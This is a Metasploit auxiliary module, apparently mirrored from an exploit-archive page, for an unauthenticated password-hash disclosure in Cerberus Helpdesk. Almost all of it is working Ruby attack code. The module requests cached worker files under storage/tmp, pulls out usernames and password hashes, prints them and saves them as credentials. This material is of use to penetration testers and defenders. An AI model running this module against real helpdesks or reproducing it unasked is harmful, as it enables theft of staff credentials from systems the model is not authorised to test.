Share
## https://sploitus.com/exploit?id=PACKETSTORM:180661
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Scanner  
include Msf::Auxiliary::Report  
  
def initialize  
super(  
'Name' => 'Cerberus Helpdesk User Hash Disclosure',  
'Description' => %q{  
This module extracts usernames and password hashes from the Cerberus Helpdesk  
through an unauthenticated access to a workers file.  
Verified on Version 4.2.3 Stable (Build 925) and 5.4.4  
},  
'References' =>  
[  
[ 'EDB', '39526' ]  
],  
'Author' =>  
[  
'asdizzle_', # discovery  
'h00die', # module  
],  
'License' => MSF_LICENSE,  
'DisclosureDate' => 'Mar 7 2016'  
)  
  
register_options(  
[  
OptString.new('TARGETURI', [false, 'URL of the Cerberus Helpdesk root', '/'])  
])  
end  
  
def run_host(rhost)  
begin  
['devblocks', 'zend'].each do |site|  
url = normalize_uri(datastore['TARGETURI'], 'storage', 'tmp', "#{site}_cache---ch_workers")  
vprint_status("Attempting to load data from #{url}")  
res = send_request_cgi({'uri' => url})  
if !res  
print_error("#{peer} Unable to connect to #{url}")  
next  
end  
  
if !res.body.include?('pass')  
print_error("Invalid response received for #{peer} for #{url}")  
next  
end  
  
cred_table = Rex::Text::Table.new 'Header' => 'Cerberus Helpdesk User Credentials',  
'Indent' => 1,  
'Columns' => ['Username', 'Password Hash']  
  
# the returned object looks json-ish, but it isn't. Unsure of format, so we'll do some ugly manual parsing.  
# this will be a rough equivalent to sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g'  
result = res.body.split('s:5')  
result.each do |cred|  
if cred.include?('email')  
cred = cred.split(':')  
username = cred[3].tr('";', '') # remove extra characters  
username = username[0...-1] # also remove trailing s  
password_hash = cred[7].tr('";', '') # remove extra characters  
print_good("Found: #{username}:#{password_hash}")  
store_valid_credential(  
user: username,  
private: password_hash,  
private_type: :nonreplayable_hash  
)  
cred_table << [username, password_hash]  
end  
end  
print_line  
print_line cred_table.to_s  
break  
end  
  
rescue ::Rex::ConnectionError  
print_error("#{peer} Unable to connect to site")  
return  
end  
end  
end